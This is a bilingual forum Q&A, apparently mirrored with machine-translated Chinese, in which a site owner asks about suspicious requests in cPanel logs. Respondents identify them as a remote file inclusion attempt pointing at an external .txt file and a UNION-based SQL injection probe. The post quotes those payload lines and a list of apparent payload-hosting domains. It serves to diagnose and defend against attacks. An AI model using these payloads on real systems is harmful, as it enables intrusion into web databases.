这是注入尝试还是正常请求?
在 cPanel 的 Analog Stats 统计模块中,我注意到无数请求连接到以下示例:
/?x=19&y=15
数字是随机的,但它总是设置 x 和 y 变量。
另一类神秘请求:
/?id=http://nic.bupt.edu.cn/media/j1.txt??
请求日志中还有其他注入尝试,其中也直接写入了 sql。示例:
/jobs/jobinfo.php?id=-999.9 UNION ALL SELECT 1,(SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0x73636363726F6F745F7075626C6963),3,4,5,6,7,8,9,10,11,12,13--
看起来它们都达到了 404,但我仍然想知道这些背后的意图。
我知道这很模糊,但也许有人知道这在使用 cPanel & 时是正常的。 phpMyAdmin 服务。此外,网站上安装了一个搜索框,这可能是原因。
关于所有这些是什么有什么建议吗?
EDIT
我将所有这些内容从请求列表中取出,并切掉它们指向的 txt。也许这可以为了解这些攻击类型提供更多帮助。
http://www.diakonia-jkt.sch.id
http://www.nationalmedecine.com
http://muzykologia.lublin.pl
http://www.abi.co.uk
http://stul.netsolutions.cz
http://jack.tiscali.it
http://solid.go.ro
http://nic.bupt.edu.cn
http://www.europeanforumcyprus.eu
http://www.nationalmedecine.com
此外,在 phpMyAdmin 状态部分,它显示每小时约 900 个更改数据库查询。仅具有选择权限的用户会对数据库造成任何真正的损害吗?上面没有个人信息,但这些 SOB 正在堵塞带宽。
In cPanel's Analog Stats statistics module, I've noticed countless requests to connect to the following example:
/?x=19&y=15
The numbers are random, but its always setting x and y variables.
Another category of mysterious requests:
/?id=http://nic.bupt.edu.cn/media/j1.txt??
There are other attempts at injections in the request log that have straight sql written into them as well. Example:
/jobs/jobinfo.php?id=-999.9 UNION ALL SELECT 1,(SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0x73636363726F6F745F7075626C6963),3,4,5,6,7,8,9,10,11,12,13--
It looks like they are all reaching a 404, but I'm still wondering about the intent behind these.
I know this is vague, but maybe someone knows that this is normal while using cPanel & phpMyAdmin services. Also, there was a search box installed on the site which could be the reason.
Any suggestions as to what all these are?
EDIT
I pulled all of these out of the request lists and sliced off the txt they are pointing to. Maybe this provides more help as to what kind of attacks these are.
http://www.diakonia-jkt.sch.id
http://www.nationalmedecine.com
http://muzykologia.lublin.pl
http://www.abi.co.uk
http://stul.netsolutions.cz
http://jack.tiscali.it
http://solid.go.ro
http://nic.bupt.edu.cn
http://www.europeanforumcyprus.eu
http://www.nationalmedecine.com
Also, in phpMyAdmin status section, it shows ~900 change db queries per hour. Can a user with only select privs do any real damage to the db? There is no personal info on it, but these SOB's are clogging up the bandwidth.
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(4)
这些(除了最上面的)是自动(?)尝试寻找代码中的弱点;
/?id=http://nic.bupt.edu.cn/media/j1. txt??
尝试从另一台服务器导入 PHP 页面。这是一个众所周知的问题,尤其是对于较旧的 PHP 软件而言。
“UNION ALL SELECT 1”是一个明显的 SQL 插入尝试。架构 ID 0x73636363726F6F745F7075626C6963 解码为“scccroot_public”。我不确定这是哪个数据库。但他们正在试图控制它,这是肯定的。
These (except for the top one) are automated(?) attempts to find weaknesses in the code;
/?id=http://nic.bupt.edu.cn/media/j1.txt??
Tries to import a PHP page from another server. A well-known problem especially with older PHP software.
The "UNION ALL SELECT 1" is an obvious SQL insertion attempt. schema ID 0x73636363726F6F745F7075626C6963 decodes to "scccroot_public". I'm not sure for which database this is. But they are trying to take control of it, that's sure.
x=19&y=15看起来您的网站上有一个包含method=get和输入type=image的表单。你记录推荐人吗?The
x=19&y=15looks like you have a form on your site withmethod=getand an inputtype=image. Do you log referrer?/?x=19&y=15可以表示<输入类型=“图像”/>/?x=19&y=15could represent an<input type="image" />/?id=http://nic.bupt.edu.cn/media/j1. txt??看起来像是某种跨站点的东西,一个无用的东西,因为它加载一个纯文本文件 O_O
/?id=http://nic.bupt.edu.cn/media/j1.txt?? looks like some sort of cross-site stuff, a useless one because it loads a plain text file O_O